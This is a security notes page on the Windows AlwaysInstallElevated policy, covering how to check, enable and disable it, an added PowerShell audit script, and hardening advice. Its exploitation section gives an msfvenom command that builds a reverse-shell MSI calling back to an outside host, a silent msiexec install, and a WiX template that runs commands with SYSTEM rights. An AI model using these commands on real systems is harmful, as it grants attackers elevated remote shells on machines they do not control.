10 - Always Install Elevated


Always Install with Elevated Privileges

The "Always install with elevated privileges" policy directs Windows Installer to run .msi packages with elevated permissions, even when the user starting the installation is not an administrator. The setting exists under both Computer Configuration and User Configuration.

Security Risks

  • Malicious actors can exploit this setting to execute arbitrary code during software installation.

  • If enabled, it creates a significant security vulnerability, potentially leading to privilege escalation.


Configuration Check

Using Group Policy Editor

You can check this setting in the Group Policy Editor (gpedit.msc):

  1. Navigate to:

    • Computer Configuration → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."

    • User Configuration → Administrative Templates → Windows Components → Windows Installer → "Always install with elevated privileges."

  2. Ensure the policy is disabled to prevent misuse.

Using PowerShell

To verify the configuration via PowerShell:

Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated
Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated

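If both values are set to 1, the policy is active. An error stating that the path or property does not exist means the value is not configured in that hive.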

Set the Policy

To enable or disable the policy via PowerShell:

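# The Installer policy key may not exist yet; create it first, otherwise
# Set-ItemProperty fails. Writing under HKLM requires an elevated session.
foreach ($hive in 'HKLM:', 'HKCU:') {
    $key = "$hive\Software\Policies\Microsoft\Windows\Installer"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
}

# Enable the policy (dangerous)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 1

# Disable the policy (recommended)
Set-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0
Set-ItemProperty -Path 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name 'AlwaysInstallElevated' -Value 0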

Exploitation

If this policy is enabled, attackers can generate and install a malicious Microsoft Software Installer (.msi) package to gain elevated privileges.

Generate Malicious MSI with msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f msi > sample.msi

Install the Malicious Package

msiexec /quiet /qn /i sample.msi

This executes the payload embedded in the MSI file with elevated privileges.


Creating a Custom MSI

Instead of using msfvenom, you can create a custom MSI with the WiX Toolset to execute specific commands or scripts during installation.

Steps to Create a Custom MSI

  1. Download WiX Toolset

  2. Install and Update PATH: add the WiX binaries to your system path:

    set PATH=%PATH%;"C:\Program Files (x86)\WiX Toolset v3.14\bin"

  3. Create the WiX Project File: example sample.wxs file:

    <?xml version="1.0"?>
    <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
      <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
               Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
        <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
        <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
        <Directory Id="TARGETDIR" Name="SourceDir">
          <Directory Id="ProgramFilesFolder">
            <Directory Id="INSTALLLOCATION" Name="Example">
              <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
              </Component>
            </Directory>
          </Directory>
        </Directory>
        <Feature Id="DefaultFeature" Level="1">
          <ComponentRef Id="ApplicationFiles"/>
        </Feature>
        <Property Id="cmdline">cmd.exe /C whoami /groups > C:\Users\Quickemu\Desktop\test.txt</Property>
        <CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
        <CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
          fail_here
        </CustomAction>
        <InstallExecuteSequence>
          <Custom Action="Stage1" After="InstallInitialize"></Custom>
          <Custom Action="Stage2" Before="InstallFiles"></Custom>
        </InstallExecuteSequence>
      </Product>
    </Wix>

  4. Compile the WiX Project: convert the .wxs file into a .wixobj and then into an MSI file:

    candle sample.wxs
    light.exe sample.wixobj

  5. Execute the Custom MSI

    msiexec /quiet /qn /i sample.msi

Recommendations

  • Disable the Policy: Ensure the Always Install with Elevated Privileges policy is disabled in both HKLM and HKCU.

  • Audit Installer Files: Regularly review MSI packages for malicious content.

  • Restrict Permissions: Limit access to installer execution to trusted users only.
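
The PowerShell check and the "Disable the Policy" recommendation, combined into one audit as an added example (not part of the original page). It goes beyond the HKCU check by reading every loaded user hive under HKEY_USERS, since HKCU only reflects the current user. The function names Get-AieValue and Test-AlwaysInstallElevated are hypothetical; run it from an elevated session so other users' hives are readable.

```powershell
# Added example: audit AlwaysInstallElevated in HKLM and in every loaded user hive.
# Get-AieValue and Test-AlwaysInstallElevated are hypothetical helper names.

function Get-AieValue {
    param([Parameter(Mandatory)][string]$KeyPath)
    # Returns the DWORD value, or $null when the key or the value is absent
    # (policy not configured in that hive).
    $item = Get-ItemProperty -Path $KeyPath -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $sub = 'Software\Policies\Microsoft\Windows\Installer'
    $machine = Get-AieValue -KeyPath "HKLM:\$sub"

    # HKEY_USERS holds one subkey per loaded profile; the regex keeps real
    # user SIDs and skips the *_Classes subkeys and built-in service accounts.
    $userKeys = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' }

    foreach ($k in $userKeys) {
        $user = Get-AieValue -KeyPath "Registry::HKEY_USERS\$($k.PSChildName)\$sub"
        [pscustomobject]@{
            Sid          = $k.PSChildName
            MachineValue = $machine
            UserValue    = $user
            # The policy is active only when both values are 1.
            Effective    = ($machine -eq 1 -and $user -eq 1)
        }
    }
}

$results = @(Test-AlwaysInstallElevated)
$results | Format-Table -AutoSize
if ($results.Effective -contains $true) {
    Write-Warning 'AlwaysInstallElevated is active for at least one loaded user profile.'
}
```

Profiles that are not loaded at the time of the audit are not covered; a value of 1 in HKLM alone is still worth reporting, because any user hive that later sets the value completes the condition.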


Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!
